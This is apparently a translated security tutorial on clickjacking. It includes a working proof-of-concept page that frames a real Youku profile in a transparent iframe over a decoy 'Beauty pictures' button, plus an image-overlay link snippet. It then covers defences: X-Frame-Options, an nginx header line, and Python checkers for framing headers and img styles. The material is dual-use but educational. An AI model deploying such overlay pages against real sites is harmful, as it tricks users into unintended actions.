Click hijacking attack
2022-07-26 17:47:00 【Leisurely summer】
1. Attack principle
Clickjacking (click jacking), also known as a UI redressing (UI covering) attack.
The attacker builds a web page that embeds the target site in an iframe and hides that iframe, so the user is unaware that the target site is present. The user is then lured into clicking a specific button on the visible page. That button is placed at exactly the position of a key button in the embedded target page, so the user unknowingly clicks the target's button and is tricked into performing a dangerous operation.

2. Attack methods
There are two approaches:
- In the first, the attacker overlays a transparent iframe on a web page and entices the user to interact with that page; what the user actually clicks is the transparent iframe.
- In the second, the attacker uses an image to cover the web page, blocking out the content that originally sat at that position.
3. iframe overlay attack and protection
An iframe attack is like laying a sheet of transparent paper over a picture: the page you see is underneath, but what you actually click is another page that the attacker has made transparent. A simple example of clickjacking: you click an unknown link and, without meaning to, follow someone's blog or subscribe to their videos.
Suppose I have posted many videos on Youku and want more people to follow me, so I prepare a page like this:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Clickjacking POC</title>
<style>
/* the framed target site: stretched over the viewport, stacked on top
   (z-index 2) and fully transparent, so it receives the click but is invisible */
iframe {
  width: 1440px;
  height: 900px;
  position: absolute;
  top: 0px;
  left: 0px;
  z-index: 2;
  -moz-opacity: 0;
  opacity: 0;
  filter: alpha(opacity=0);
}
/* the visible decoy button, placed directly under the "follow" control
   of the framed page */
button {
  position: absolute;
  top: 270px;
  left: 1150px;
  z-index: 1;
  width: 90px;
  height: 40px;
}
</style>
</head>
<body>
<button>Beauty pictures</button>
<img src="http://pic1.win4000.com/wallpaper/2018-03-19/5aaf2bf0122d2.jpg">
<iframe src="http://i.youku.com/u/UMjA0NTg4Njcy" scrolling="no"></iframe>
</body>
</html>
Of course, a real attack page would be far more polished than this simple example.
Solution
Use the HTTP response header X-Frame-Options. X-Frame-Options was created specifically to address clickjacking. It has three possible values:
- DENY: the browser refuses to render the page inside any frame;
- SAMEORIGIN: the page may only be framed by pages from the same origin (domain);
- ALLOW-FROM origin: the page may only be framed by pages from the specified origin;
nginx configuration:
add_header X-Frame-Options SAMEORIGIN;
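The following is an added example, not code from the original post: it models how a browser honouring X-Frame-Options decides whether a page may be framed, so you can check a response's headers against the three values above. The URLs, header dictionaries and the function names are constructed for the illustration.

```python
from urllib.parse import urlsplit


def origin_of(url: str) -> str:
    """Return scheme://host[:port], the unit SAMEORIGIN and ALLOW-FROM compare on."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def framing_allowed(headers: dict, page_url: str, framer_url: str) -> bool:
    """Would a browser that honours X-Frame-Options render page_url inside a
    frame served from framer_url?

    Header names are matched case-insensitively.  A missing header means the
    page can be framed by anyone, which is the vulnerable default the
    clickjacking PoC above relies on.
    """
    value = None
    for name, raw in headers.items():
        if name.lower() == "x-frame-options":
            value = raw.strip()
            break
    if value is None:
        return True

    directive = value.upper()
    if directive == "DENY":
        return False
    if directive == "SAMEORIGIN":
        return origin_of(page_url) == origin_of(framer_url)
    if directive.startswith("ALLOW-FROM"):
        allowed = value[len("ALLOW-FROM"):].strip()
        return origin_of(framer_url) == origin_of(allowed)
    # Unrecognised value: browsers ignore the header, so the page stays framable.
    return True


if __name__ == "__main__":
    # Constructed sample: the nginx setting from this post, applied to a video
    # profile page that an unrelated PoC page tries to frame.
    nginx_headers = {"X-Frame-Options": "SAMEORIGIN"}
    print(framing_allowed(nginx_headers,
                          "https://video.example/u/me",
                          "https://attacker.example/poc.html"))   # False
```

Note that Chrome, Safari and current Firefox no longer honour ALLOW-FROM; to allow a specific third-party origin, use the Content-Security-Policy frame-ancestors directive, which supersedes X-Frame-Options.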
4. Image overlay attack and protection
In an image overlay attack (Cross Site Image Overlaying), the attacker uses one or more images and, through the image's style attribute or other CSS the attacker controls, positions them over the web page to achieve clickjacking. The image itself may also carry misleading content, in which case no click is needed for the deception to succeed.
Note: this kind of attack can easily appear on the website's own pages.
Example
Wherever HTML content can be entered, an attacker adds an image whose style places it over a chosen position on the page.
<a href="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE">
<img src="XXXXXX" style="position:absolute;top:90px;left:320px;" />
</a>
Solution
To defend against image overlay attacks, check the style attribute of img tags in user-submitted HTML for properties that could make the image float over, or be positioned on top of, other page content.
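As an added example (not part of the original post), here is a check of the kind described above: it walks user-submitted HTML and reports every img whose inline style could lift the image out of normal flow and over other content. It goes slightly beyond the post by also treating float, z-index, negative margins and transform as overlay primitives; the sample HTML and function names are constructed.

```python
from html.parser import HTMLParser

# position values that take an element out of normal document flow
OVERLAY_POSITIONS = {"absolute", "fixed", "sticky"}


def parse_style(style: str) -> dict:
    """Split 'a:b; c:d' into {'a': 'b', 'c': 'd'}, lower-cased and trimmed."""
    decls = {}
    for part in style.split(";"):
        if ":" in part:
            name, value = part.split(":", 1)
            decls[name.strip().lower()] = value.strip().lower()
    return decls


def overlay_risks(decls: dict) -> list:
    """Return the declarations that could make an image overlay the page."""
    risks = []
    for name, value in decls.items():
        if name == "position" and value in OVERLAY_POSITIONS:
            risks.append(f"{name}:{value}")
        elif name == "float" and value in ("left", "right"):
            risks.append(f"{name}:{value}")
        elif name in ("z-index", "transform"):
            risks.append(f"{name}:{value}")
        elif name.startswith("margin") and any(t.startswith("-") for t in value.split()):
            risks.append(f"{name}:{value}")   # negative margins pull the image over neighbours
    return risks


class ImgStyleAuditor(HTMLParser):
    """Collect every <img> whose style attribute carries overlay risks."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attrs = dict(attrs)
        risks = overlay_risks(parse_style(attrs.get("style") or ""))
        if risks:
            self.findings.append((attrs.get("src") or "", risks))


def audit_user_html(html: str) -> list:
    """Return [(src, [risky declarations]), ...] for the submitted HTML."""
    auditor = ImgStyleAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings
```

A sanitizer would reject or strip the flagged declarations rather than just reporting them; a plain width/height style on an img produces no finding.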
Summary:
Clickjacking is an attack that many people pay little attention to. It requires enticing the user to interact with the page, so it costs more to carry out. In addition, developers may assume that users are simply being careless, and so they do not take this kind of attack seriously.